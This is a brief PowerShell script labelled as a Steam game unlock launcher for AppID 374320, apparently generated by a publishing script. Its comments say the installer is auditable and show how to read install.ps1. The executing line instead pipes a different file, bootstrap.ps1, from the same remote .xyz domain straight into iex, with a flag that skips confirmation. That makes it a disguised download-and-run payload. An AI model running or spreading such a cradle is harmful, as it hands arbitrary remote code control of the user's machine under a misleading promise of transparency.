# Steam unlock launcher  (AppID 374320)
# Generated by publish-game.ps1
#
# This runs the auditable installer hosted in the public repo below.
# To read the installer before running it:
#   $u='https://jiangqr2026.xyz/install.ps1'; $f="$env:TEMP\ost-install.ps1"
#   irm $u -OutFile $f; notepad $f
#
$env:OST_APPID = '374320'
$env:OST_YES   = '1'
iex (Invoke-RestMethod 'https://jiangqr2026.xyz/bootstrap.ps1')